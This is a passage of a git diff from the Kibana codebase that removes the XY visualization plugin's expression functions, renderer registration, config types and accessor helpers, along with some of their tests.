and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; -import type { - ExpressionFunctionDefinition, - Datatable, - ExpressionValueBoxed, -} from '@kbn/expressions-plugin/public'; -import type { Scale } from '../types'; - -export type ExpressionValueScale = ExpressionValueBoxed< - 'vis_scale', - { - boundsMargin?: Scale['boundsMargin']; - defaultYExtents?: Scale['defaultYExtents']; - max?: Scale['max']; - min?: Scale['min']; - mode?: Scale['mode']; - setYExtents?: Scale['setYExtents']; - scaleType: Scale['type']; - } ->; - -export const visScale = (): ExpressionFunctionDefinition< - 'visscale', - Datatable | null, - Scale, - ExpressionValueScale -> => ({ - name: 'visscale', - help: i18n.translate('visTypeXy.function.scale.help', { - defaultMessage: 'Generates scale object', - }), - type: 'vis_scale', - args: { - boundsMargin: { - types: ['number', 'string'], - help: i18n.translate('visTypeXy.function.scale.boundsMargin.help', { - defaultMessage: 'Margin of bounds', - }), - }, - defaultYExtents: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.scale.defaultYExtents.help', { - defaultMessage: 'Flag which allows to scale to data bounds', - }), - }, - setYExtents: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.scale.setYExtents.help', { - defaultMessage: 'Flag which allows to set your own extents', - }), - }, - max: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.scale.max.help', { - defaultMessage: 'Max value', - }), - }, - min: { - types: ['number', 'null'], - help: i18n.translate('visTypeXy.function.scale.min.help', { - defaultMessage: 'Min value', - }), - }, - mode: { - types: ['string'], - help: i18n.translate('visTypeXy.function.scale.mode.help', { - defaultMessage: 'Scale mode. Can be normal, percentage, wiggle or silhouette', - }), - }, - type: { - types: ['string'], - help: i18n.translate('visTypeXy.function.scale.type.help', { - defaultMessage: 'Scale type. Can be linear, log or square root', - }), - required: true, - }, - }, - fn: (context, args) => { - return { - type: 'vis_scale', - boundsMargin: args.boundsMargin, - defaultYExtents: args.defaultYExtents, - setYExtents: args.setYExtents, - max: args.max, - min: args.min, - mode: args.mode, - scaleType: args.type, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts b/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts deleted file mode 100644 index 8dc7481300bc0..0000000000000 --- a/src/plugins/vis_types/xy/public/expression_functions/xy_vis_fn.ts +++ /dev/null @@ -1,370 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { i18n } from '@kbn/i18n'; - -import type { - ExpressionFunctionDefinition, - Datatable, - Render, -} from '@kbn/expressions-plugin/common'; -import { - prepareLogTable, - Dimension, - DEFAULT_LEGEND_SIZE, - LegendSize, -} from '@kbn/visualizations-plugin/public'; -import type { VisParams, XYVisConfig } from '../types'; -import type { XyVisType } from '../../common'; - -export const visName = 'xy_vis'; -export interface RenderValue { - visData: Datatable; - visType: XyVisType; - visConfig: VisParams; - syncColors: boolean; - syncTooltips: boolean; -} - -export type VisTypeXyExpressionFunctionDefinition = ExpressionFunctionDefinition< - typeof visName, - Datatable, - XYVisConfig, - Render ->; - -export const visTypeXyVisFn = (): VisTypeXyExpressionFunctionDefinition => ({ - name: visName, - type: 'render', - context: { - types: ['datatable'], - }, - help: i18n.translate('visTypeXy.functions.help', { - defaultMessage: 'XY visualization', - }), - args: { - type: { - types: ['string'], - default: '""', - help: 'xy vis type', - }, - chartType: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.args.chartType.help', { - defaultMessage: 'Type of a chart. Can be line, area or histogram', - }), - }, - addTimeMarker: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addTimeMarker.help', { - defaultMessage: 'Show time marker', - }), - }, - truncateLegend: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.truncateLegend.help', { - defaultMessage: 'Defines if the legend will be truncated or not', - }), - }, - maxLegendLines: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.args.maxLegendLines.help', { - defaultMessage: 'Defines the maximum lines per legend item', - }), - }, - legendSize: { - types: ['string'], - default: DEFAULT_LEGEND_SIZE, - help: i18n.translate('visTypeXy.function.args.args.legendSize.help', { - defaultMessage: 'Specifies the legend size.', - }), - options: [ - LegendSize.AUTO, - LegendSize.SMALL, - LegendSize.MEDIUM, - LegendSize.LARGE, - LegendSize.EXTRA_LARGE, - ], - strict: true, - }, - addLegend: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addLegend.help', { - defaultMessage: 'Show chart legend', - }), - }, - addTooltip: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.addTooltip.help', { - defaultMessage: 'Show tooltip on hover', - }), - }, - legendPosition: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.legendPosition.help', { - defaultMessage: 'Position the legend on top, bottom, left, right of the chart', - }), - }, - categoryAxes: { - types: ['category_axis'], - help: i18n.translate('visTypeXy.function.args.categoryAxes.help', { - defaultMessage: 'Category axis config', - }), - multi: true, - }, - thresholdLine: { - types: ['threshold_line'], - help: i18n.translate('visTypeXy.function.args.thresholdLine.help', { - defaultMessage: 'Threshold line config', - }), - }, - labels: { - types: ['label'], - help: i18n.translate('visTypeXy.function.args.labels.help', { - defaultMessage: 'Chart labels config', - }), - }, - orderBucketsBySum: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.orderBucketsBySum.help', { - defaultMessage: 'Order buckets by sum', - }), - }, - seriesParams: { - types: ['series_param'], - help: i18n.translate('visTypeXy.function.args.seriesParams.help', { - defaultMessage: 'Series param config', - }), - multi: true, - }, - valueAxes: { - types: ['value_axis'], - help: i18n.translate('visTypeXy.function.args.valueAxes.help', { - defaultMessage: 'Value axis config', - }), - multi: true, - }, - radiusRatio: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.radiusRatio.help', { - defaultMessage: 'Dot size ratio', - }), - }, - gridCategoryLines: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.gridCategoryLines.help', { - defaultMessage: 'Show grid category lines in chart', - }), - }, - gridValueAxis: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.gridValueAxis.help', { - defaultMessage: 'Name of value axis for which we show grid', - }), - }, - isVislibVis: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.isVislibVis.help', { - defaultMessage: - 'Flag to indicate old vislib visualizations. Used for backwards compatibility including colors', - }), - }, - detailedTooltip: { - types: ['boolean'], - help: i18n.translate('visTypeXy.function.args.detailedTooltip.help', { - defaultMessage: 'Show detailed tooltip', - }), - }, - fittingFunction: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.fittingFunction.help', { - defaultMessage: 'Name of fitting function', - }), - }, - times: { - types: ['time_marker'], - help: i18n.translate('visTypeXy.function.args.times.help', { - defaultMessage: 'Time marker config', - }), - multi: true, - }, - palette: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.palette.help', { - defaultMessage: 'Defines the chart palette name', - }), - }, - fillOpacity: { - types: ['number'], - help: i18n.translate('visTypeXy.function.args.fillOpacity.help', { - defaultMessage: 'Defines the area chart fill opacity', - }), - }, - xDimension: { - types: ['xy_dimension', 'null'], - help: i18n.translate('visTypeXy.function.args.xDimension.help', { - defaultMessage: 'X axis dimension config', - }), - }, - yDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.yDimension.help', { - defaultMessage: 'Y axis dimension config', - }), - multi: true, - }, - zDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.zDimension.help', { - defaultMessage: 'Z axis dimension config', - }), - multi: true, - }, - widthDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.widthDimension.help', { - defaultMessage: 'Width dimension config', - }), - multi: true, - }, - seriesDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.seriesDimension.help', { - defaultMessage: 'Series dimension config', - }), - multi: true, - }, - splitRowDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.splitRowDimension.help', { - defaultMessage: 'Split by row dimension config', - }), - multi: true, - }, - splitColumnDimension: { - types: ['xy_dimension'], - help: i18n.translate('visTypeXy.function.args.splitColumnDimension.help', { - defaultMessage: 'Split by column dimension config', - }), - multi: true, - }, - ariaLabel: { - types: ['string'], - help: i18n.translate('visTypeXy.function.args.ariaLabel.help', { - defaultMessage: 'Specifies the aria label of the xy chart', - }), - required: false, - }, - }, - fn(context, args, handlers) { - const visType = args.type; - const visConfig = { - ariaLabel: - args.ariaLabel ?? - (handlers.variables?.embeddableTitle as string) ?? - handlers.getExecutionContext?.()?.description, - type: args.chartType, - addLegend: args.addLegend, - addTooltip: args.addTooltip, - legendPosition: args.legendPosition, - addTimeMarker: args.addTimeMarker, - maxLegendLines: args.maxLegendLines, - truncateLegend: args.truncateLegend, - legendSize: args.legendSize, - categoryAxes: args.categoryAxes.map((categoryAxis) => ({ - ...categoryAxis, - type: categoryAxis.axisType, - })), - orderBucketsBySum: args.orderBucketsBySum, - labels: args.labels, - thresholdLine: args.thresholdLine, - valueAxes: args.valueAxes.map((valueAxis) => ({ ...valueAxis, type: valueAxis.axisType })), - grid: { - categoryLines: args.gridCategoryLines, - valueAxis: args.gridValueAxis, - }, - seriesParams: args.seriesParams.map((seriesParam) => ({ - ...seriesParam, - type: seriesParam.seriesParamType, - })), - radiusRatio: args.radiusRatio, - times: args.times, - isVislibVis: args.isVislibVis, - detailedTooltip: args.detailedTooltip, - palette: { - type: 'palette', - name: args.palette, - }, - fillOpacity: args.fillOpacity, - fittingFunction: args.fittingFunction, - dimensions: { - x: args.xDimension, - y: args.yDimension, - z: args.zDimension, - width: args.widthDimension, - series: args.seriesDimension, - splitRow: args.splitRowDimension, - splitColumn: args.splitColumnDimension, - }, - } as VisParams; - - if (handlers?.inspectorAdapters?.tables) { - const argsTable: Dimension[] = [ - [ - args.yDimension, - i18n.translate('visTypeXy.function.dimension.metric', { - defaultMessage: 'Metric', - }), - ], - [ - args.zDimension, - i18n.translate('visTypeXy.function.adimension.dotSize', { - defaultMessage: 'Dot size', - }), - ], - [ - args.splitColumnDimension, - i18n.translate('visTypeXy.function.dimension.splitcolumn', { - defaultMessage: 'Column split', - }), - ], - [ - args.splitRowDimension, - i18n.translate('visTypeXy.function.dimension.splitrow', { - defaultMessage: 'Row split', - }), - ], - ]; - - if (args.xDimension) { - argsTable.push([ - [args.xDimension], - i18n.translate('visTypeXy.function.adimension.bucket', { - defaultMessage: 'Bucket', - }), - ]); - } - - const logTable = prepareLogTable(context, argsTable); - handlers.inspectorAdapters.tables.logDatatable('default', logTable); - } - - return { - type: 'render', - as: visName, - value: { - context, - visType, - visConfig, - visData: context, - syncColors: handlers?.isSyncColorsEnabled?.() ?? false, - syncTooltips: handlers?.isSyncTooltipsEnabled?.() ?? false, - }, - }; - }, -}); diff --git a/src/plugins/vis_types/xy/public/index.ts b/src/plugins/vis_types/xy/public/index.ts index 41a8e08fa1ad2..7ad2e3058e49f 100644 --- a/src/plugins/vis_types/xy/public/index.ts +++ b/src/plugins/vis_types/xy/public/index.ts @@ -29,7 +29,6 @@ export type { ValidationVisOptionsProps } from './editor/components/common/valid export { TruncateLabelsOption } from './editor/components/common/truncate_labels'; export { getPositions } from './editor/positions'; export { getScaleTypes } from './editor/scale_types'; -export { getAggId } from './config/get_agg_id'; // Export common types export * from '../common'; diff --git a/src/plugins/vis_types/xy/public/plugin.ts b/src/plugins/vis_types/xy/public/plugin.ts index 29a5e434a5f01..4561006e43e92 100644 --- a/src/plugins/vis_types/xy/public/plugin.ts +++ b/src/plugins/vis_types/xy/public/plugin.ts @@ -6,31 +6,12 @@ * Side Public License, v 1. */ -import type { CoreSetup, CoreStart, Plugin } from '@kbn/core/public'; -import type { Plugin as ExpressionsPublicPlugin } from '@kbn/expressions-plugin/public'; -import type { VisualizationsSetup, VisualizationsStart } from '@kbn/visualizations-plugin/public'; -import type { FieldFormatsStart } from '@kbn/field-formats-plugin/public'; -import type { ChartsPluginSetup, ChartsPluginStart } from '@kbn/charts-plugin/public'; -import type { DataPublicPluginStart } from '@kbn/data-plugin/public'; -import type { - UsageCollectionSetup, - UsageCollectionStart, -} from '@kbn/usage-collection-plugin/public'; -import { createStartServicesGetter } from '@kbn/kibana-utils-plugin/public'; -import { - setDataActions, - setFormatService, - setThemeService, - setUISettings, - setDocLinks, - setPalettesService, - setActiveCursor, -} from './services'; +import type { CoreSetup, Plugin } from '@kbn/core/public'; +import type { VisualizationsSetup } from '@kbn/visualizations-plugin/public'; +import type { ChartsPluginSetup } from '@kbn/charts-plugin/public'; +import { setUISettings, setPalettesService } from './services'; import { visTypesDefinitions } from './vis_types'; -import { getXYVisRenderer } from './vis_renderer'; - -import * as expressionFunctions from './expression_functions'; // eslint-disable-next-line @typescript-eslint/no-empty-interface export interface VisTypeXyPluginSetup {} @@ -39,70 +20,29 @@ export interface VisTypeXyPluginStart {} /** @internal */ export interface VisTypeXyPluginSetupDependencies { - expressions: ReturnType; visualizations: VisualizationsSetup; charts: ChartsPluginSetup; - usageCollection: UsageCollectionSetup; -} - -/** @internal */ -export interface VisTypeXyPluginStartDependencies { - expressions: ReturnType; - visualizations: VisualizationsStart; - data: DataPublicPluginStart; - fieldFormats: FieldFormatsStart; - charts: ChartsPluginStart; - usageCollection?: UsageCollectionStart; } -type VisTypeXyCoreSetup = CoreSetup; +type VisTypeXyCoreSetup = CoreSetup<{}, VisTypeXyPluginStart>; /** @internal */ export class VisTypeXyPlugin implements - Plugin< - VisTypeXyPluginSetup, - VisTypeXyPluginStart, - VisTypeXyPluginSetupDependencies, - VisTypeXyPluginStartDependencies - > + Plugin { public setup( core: VisTypeXyCoreSetup, - { expressions, visualizations, charts, usageCollection }: VisTypeXyPluginSetupDependencies + { visualizations, charts }: VisTypeXyPluginSetupDependencies ) { setUISettings(core.uiSettings); - setThemeService(charts.theme); setPalettesService(charts.palettes); - const getStartDeps = createStartServicesGetter< - VisTypeXyPluginStartDependencies, - VisTypeXyPluginStart - >(core.getStartServices); - - expressions.registerRenderer( - getXYVisRenderer({ - getStartDeps, - }) - ); - expressions.registerFunction(expressionFunctions.visTypeXyVisFn); - expressions.registerFunction(expressionFunctions.categoryAxis); - expressions.registerFunction(expressionFunctions.timeMarker); - expressions.registerFunction(expressionFunctions.valueAxis); - expressions.registerFunction(expressionFunctions.seriesParam); - expressions.registerFunction(expressionFunctions.thresholdLine); - expressions.registerFunction(expressionFunctions.label); - expressions.registerFunction(expressionFunctions.visScale); - visTypesDefinitions.forEach(visualizations.createBaseVisualization); return {}; } - public start(core: CoreStart, { data, charts, fieldFormats }: VisTypeXyPluginStartDependencies) { - setFormatService(fieldFormats); - setDataActions(data.actions); - setDocLinks(core.docLinks); - setActiveCursor(charts.activeCursor); + public start() { return {}; } } diff --git a/src/plugins/vis_types/xy/public/services.ts b/src/plugins/vis_types/xy/public/services.ts index d680a5d7f4498..2358bcb5ede2e 100644 --- a/src/plugins/vis_types/xy/public/services.ts +++ b/src/plugins/vis_types/xy/public/services.ts @@ -6,29 +6,13 @@ * Side Public License, v 1. */ -import type { CoreSetup, DocLinksStart } from '@kbn/core/public'; -import type { FieldFormatsStart } from '@kbn/field-formats-plugin/public'; -import type { DataPublicPluginStart } from '@kbn/data-plugin/public'; -import type { ChartsPluginSetup, ChartsPluginStart } from '@kbn/charts-plugin/public'; +import type { CoreSetup } from '@kbn/core/public'; +import type { ChartsPluginSetup } from '@kbn/charts-plugin/public'; import { createGetterSetter } from '@kbn/kibana-utils-plugin/public'; export const [getUISettings, setUISettings] = createGetterSetter('xy core.uiSettings'); -export const [getDataActions, setDataActions] = - createGetterSetter('xy data.actions'); - -export const [getFormatService, setFormatService] = - createGetterSetter('xy fieldFormats'); - -export const [getThemeService, setThemeService] = - createGetterSetter('xy charts.theme'); - -export const [getActiveCursor, setActiveCursor] = - createGetterSetter('xy charts.activeCursor'); - export const [getPalettesService, setPalettesService] = createGetterSetter('xy charts.palette'); - -export const [getDocLinks, setDocLinks] = createGetterSetter('DocLinks'); diff --git a/src/plugins/vis_types/xy/public/types/config.ts b/src/plugins/vis_types/xy/public/types/config.ts deleted file mode 100644 index 287787193bd20..0000000000000 --- a/src/plugins/vis_types/xy/public/types/config.ts +++ /dev/null @@ -1,123 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - AxisSpec, - CustomTooltip, - Fit, - GridLineStyle, - Position, - Rotation, - SeriesScales, - TickFormatter, - TooltipProps, - TooltipValueFormatter, - YDomainRange, -} from '@elastic/charts'; - -import type { Dimension, Scale, ThresholdLine } from './param'; - -export interface Column { - id: string | null; - name: string; -} - -export interface Aspect { - accessor: Column['id']; - aggType: string | null; - aggId: string | null; - column?: Dimension['accessor']; - title: Column['name']; - format?: Dimension['format']; - formatter?: TickFormatter; - params: Dimension['params']; -} - -export interface Aspects { - x: Aspect; - y: Aspect[]; - z?: Aspect; - series?: Aspect[]; - splitColumn?: Aspect; - splitRow?: Aspect; -} - -export interface AxisGrid { - show?: boolean; - styles?: GridLineStyle; -} - -export interface TickOptions { - show?: boolean; - size?: number; - count?: number; - padding?: number; - formatter?: TickFormatter; - labelFormatter?: TickFormatter; - rotation?: number; - showDuplicates?: boolean; - integersOnly?: boolean; - showOverlappingTicks?: boolean; - showOverlappingLabels?: boolean; -} - -export type YScaleType = SeriesScales['yScaleType']; -export type XScaleType = SeriesScales['xScaleType']; - -export type ScaleConfig = Omit & { - type?: S; -}; - -export interface AxisConfig { - id: string; - groupId?: string; - position: Position; - ticks?: TickOptions; - show: boolean; - style: AxisSpec['style']; - scale: ScaleConfig; - domain?: YDomainRange; - title?: string; - grid?: AxisGrid; - integersOnly: boolean; - timeAxisLayerCount?: number; -} - -export interface LegendOptions { - show: boolean; - position?: Position; -} - -export type ThresholdLineConfig = Omit & { - dash?: number[]; - groupId?: string; -}; - -export type TooltipConfig = Omit & { - detailedTooltip?: (headerFormatter?: TooltipValueFormatter) => CustomTooltip; -}; - -export interface VisConfig { - legend: LegendOptions; - tooltip: TooltipConfig; - xAxis: AxisConfig; - yAxes: Array>; - aspects: Aspects; - rotation: Rotation; - thresholdLine: ThresholdLineConfig; - orderBucketsBySum?: boolean; - showCurrentTime: boolean; - isTimeChart: boolean; - markSizeRatio: number; - showValueLabel: boolean; - enableHistogramMode: boolean; - fittingFunction?: Exclude; - fillOpacity?: number; - detailedTooltip?: boolean; - isVislibVis?: boolean; -} diff --git a/src/plugins/vis_types/xy/public/types/constants.ts b/src/plugins/vis_types/xy/public/types/constants.ts index 05ed0783d4c68..e4c7c30dc2e89 100644 --- a/src/plugins/vis_types/xy/public/types/constants.ts +++ b/src/plugins/vis_types/xy/public/types/constants.ts @@ -40,9 +40,3 @@ export enum ThresholdLineStyle { Dashed = 'dashed', DotDashed = 'dot-dashed', } - -export enum ColorMode { - Background = 'Background', - Labels = 'Labels', - None = 'None', -} diff --git a/src/plugins/vis_types/xy/public/types/index.ts b/src/plugins/vis_types/xy/public/types/index.ts index 6abbdfabaa956..04426b03c5b87 100644 --- a/src/plugins/vis_types/xy/public/types/index.ts +++ b/src/plugins/vis_types/xy/public/types/index.ts @@ -7,6 +7,4 @@ */ export * from './constants'; -export * from './config'; export * from './param'; -export type { VisTypeNames, XyVisTypeDefinition } from './vis_type'; diff --git a/src/plugins/vis_types/xy/public/types/param.ts b/src/plugins/vis_types/xy/public/types/param.ts index a491efad97fcb..5e65c85e9f2e9 100644 --- a/src/plugins/vis_types/xy/public/types/param.ts +++ b/src/plugins/vis_types/xy/public/types/param.ts @@ -11,21 +11,12 @@ import type { PaletteOutput } from '@kbn/coloring'; import type { Style, Labels } from '@kbn/charts-plugin/public'; import type { SchemaConfig, - ExpressionValueXYDimension, FakeParams, HistogramParams, DateHistogramParams, LegendSize, } from '@kbn/visualizations-plugin/public'; -import type { ChartType, XyVisType } from '../../common'; -import type { - ExpressionValueCategoryAxis, - ExpressionValueSeriesParam, - ExpressionValueValueAxis, - ExpressionValueLabel, - ExpressionValueThresholdLine, - ExpressionValueTimeMarker, -} from '../expression_functions'; +import type { ChartType } from '../../common'; import type { ChartMode, @@ -150,45 +141,3 @@ export interface VisParams { fittingFunction?: Exclude; ariaLabel?: string; } - -export interface XYVisConfig { - type: XyVisType; - chartType: ChartType; - gridCategoryLines: boolean; - gridValueAxis?: string; - categoryAxes: ExpressionValueCategoryAxis[]; - valueAxes: ExpressionValueValueAxis[]; - seriesParams: ExpressionValueSeriesParam[]; - palette: string; - addLegend: boolean; - addTooltip: boolean; - legendPosition: Position; - addTimeMarker: boolean; - truncateLegend: boolean; - maxLegendLines: number; - legendSize?: LegendSize; - orderBucketsBySum?: boolean; - labels: ExpressionValueLabel; - thresholdLine: ExpressionValueThresholdLine; - radiusRatio: number; - times: ExpressionValueTimeMarker[]; // For compatibility with vislib - /** - * flag to indicate old vislib visualizations - * used for backwards compatibility including colors - */ - isVislibVis?: boolean; - /** - * Add for detailed tooltip option - */ - detailedTooltip?: boolean; - fittingFunction?: Exclude; - fillOpacity?: number; - xDimension: ExpressionValueXYDimension | null; - yDimension: ExpressionValueXYDimension[]; - zDimension?: ExpressionValueXYDimension[]; - widthDimension?: ExpressionValueXYDimension[]; - seriesDimension?: ExpressionValueXYDimension[]; - splitRowDimension?: ExpressionValueXYDimension[]; - splitColumnDimension?: ExpressionValueXYDimension[]; - ariaLabel?: string; -} diff --git a/src/plugins/vis_types/xy/public/types/vis_type.ts b/src/plugins/vis_types/xy/public/types/vis_type.ts deleted file mode 100644 index 39d762465c34f..0000000000000 --- a/src/plugins/vis_types/xy/public/types/vis_type.ts +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { VisTypeDefinition } from '@kbn/visualizations-plugin/public'; -import { ChartType } from '../../common'; - -import { VisParams } from './param'; - -export type VisTypeNames = ChartType | 'horizontal_bar'; - -export type XyVisTypeDefinition = VisTypeDefinition; diff --git a/src/plugins/vis_types/xy/public/utils/accessors.test.ts b/src/plugins/vis_types/xy/public/utils/accessors.test.ts deleted file mode 100644 index 882c3d382a237..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/accessors.test.ts +++ /dev/null @@ -1,155 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { - COMPLEX_SPLIT_ACCESSOR, - getComplexAccessor, - isPercentileIdEqualToSeriesId, -} from './accessors'; -import { BUCKET_TYPES } from '@kbn/data-plugin/common'; -import { AccessorFn, Datum } from '@elastic/charts'; - -describe('XY chart datum accessors', () => { - const aspectBase = { - accessor: 'col-0-2', - formatter: (value: Datum) => value, - aggId: '', - title: '', - params: {}, - }; - - it('should return complex accessor for IP range aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.IP_RANGE, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - const datum = { - 'col-0-2': { type: 'range', from: '0.0.0.0', to: '127.255.255.255' }, - }; - - expect(typeof accessor).toBe('function'); - expect((accessor as AccessorFn)(datum)).toStrictEqual({ - type: 'range', - from: '0.0.0.0', - to: '127.255.255.255', - }); - }); - - it('should return complex accessor for date range aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.DATE_RANGE, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - const datum = { - 'col-0-2': { from: '1613941200000', to: '1614685113537' }, - }; - - expect(typeof accessor).toBe('function'); - expect((accessor as AccessorFn)(datum)).toStrictEqual({ - from: '1613941200000', - to: '1614685113537', - }); - }); - - it('should return complex accessor when isComplex option set to true', () => { - const aspect = { - aggType: BUCKET_TYPES.TERMS, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR, true)(aspect); - - expect(typeof accessor).toBe('function'); - expect((accessor as AccessorFn)({ 'col-0-2': 'some value' })).toBe('some value'); - }); - - it('should return simple string accessor for not range (date histogram) aggregation', () => { - const aspect = { - aggType: BUCKET_TYPES.DATE_HISTOGRAM, - ...aspectBase, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(typeof accessor).toBe('string'); - expect(accessor).toBe('col-0-2'); - }); - - it('should return simple string accessor when aspect has no formatter', () => { - const aspect = { - aggType: BUCKET_TYPES.RANGE, - ...aspectBase, - formatter: undefined, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(typeof accessor).toBe('string'); - expect(accessor).toBe('col-0-2'); - }); - - it('should return undefined when aspect has no accessor', () => { - const aspect = { - aggType: BUCKET_TYPES.RANGE, - ...aspectBase, - accessor: null, - }; - const accessor = getComplexAccessor(COMPLEX_SPLIT_ACCESSOR)(aspect); - - expect(accessor).toBeUndefined(); - }); -}); - -describe('isPercentileIdEqualToSeriesId', () => { - it('should be equal for plain column ids', () => { - const seriesColumnId = 'col-0-1'; - const columnId = `${seriesColumnId}`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should be equal for column with percentile', () => { - const seriesColumnId = '1'; - const columnId = `${seriesColumnId}.95`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should not be equal for column with percentile equal to seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `2.1`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); - - it('should be equal for column with percentile with decimal points', () => { - const seriesColumnId = '1'; - const columnId = `${seriesColumnId}['95.5']`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeTruthy(); - }); - - it('should not be equal for column with percentile with decimal points equal to seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `2['1.3']`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); - - it('should not be equal for column with percentile, where columnId contains seriesColumnId', () => { - const seriesColumnId = '1'; - const columnId = `${seriesColumnId}2.1`; - - const isEqual = isPercentileIdEqualToSeriesId(columnId, seriesColumnId); - expect(isEqual).toBeFalsy(); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/accessors.tsx b/src/plugins/vis_types/xy/public/utils/accessors.tsx index 9739a9d3328ea..40f87f8e78061 100644 --- a/src/plugins/vis_types/xy/public/utils/accessors.tsx +++ b/src/plugins/vis_types/xy/public/utils/accessors.tsx @@ -6,78 +6,6 @@ * Side Public License, v 1. */ -import { AccessorFn, Accessor } from '@elastic/charts'; -import { BUCKET_TYPES } from '@kbn/data-plugin/public'; -import { FakeParams } from '@kbn/visualizations-plugin/public'; -import type { Aspect } from '../types'; - -export const COMPLEX_X_ACCESSOR = '__customXAccessor__'; -export const COMPLEX_SPLIT_ACCESSOR = '__complexSplitAccessor__'; -const SHARD_DELAY = 'shard_delay'; - -export const getXAccessor = (aspect: Aspect): Accessor | AccessorFn => { - return ( - getComplexAccessor(COMPLEX_X_ACCESSOR)(aspect) ?? - (() => (aspect.params as FakeParams)?.defaultValue) - ); -}; - -const getFieldName = (fieldName: string, index?: number) => { - const indexStr = index !== undefined ? `::${index}` : ''; - - return `${fieldName}${indexStr}`; -}; - -export const isRangeAggType = (type: string | null) => - type === BUCKET_TYPES.DATE_RANGE || type === BUCKET_TYPES.RANGE || type === BUCKET_TYPES.IP_RANGE; - -/** - * Returns accessor function for complex accessor types - * @param aspect - * @param isComplex - forces to be functional/complex accessor - */ -export const getComplexAccessor = - (fieldName: string, isComplex: boolean = false) => - (aspect: Aspect, index?: number): Accessor | AccessorFn | undefined => { - if (!aspect.accessor || aspect.aggType === SHARD_DELAY) { - return; - } - - if (!((isComplex || isRangeAggType(aspect.aggType)) && aspect.formatter)) { - return aspect.accessor; - } - - const formatter = aspect.formatter; - const accessor = aspect.accessor; - const fn: AccessorFn = (d) => { - const v = d[accessor]; - if (v === undefined) { - return; - } - const f = formatter(v); - return f; - }; - - fn.fieldName = getFieldName(fieldName, index); - - return fn; - }; - -export const getSplitSeriesAccessorFnMap = ( - splitSeriesAccessors: Array -): Map => { - const m = new Map(); - - splitSeriesAccessors.forEach((accessor, index) => { - if (typeof accessor === 'function') { - const fieldName = getFieldName(COMPLEX_SPLIT_ACCESSOR, index); - m.set(fieldName, accessor); - } - }); - - return m; -}; - // For percentile, the aggregation id is coming in the form %s.%d, where %s is agg_id and %d - percents export const getSafeId = (columnId?: number | string | null) => { const id = String(columnId); @@ -89,12 +17,3 @@ export const getSafeId = (columnId?: number | string | null) => { const baseId = id.substring(0, id.indexOf('[') !== -1 ? id.indexOf('[') : id.indexOf('.')); return baseId; }; - 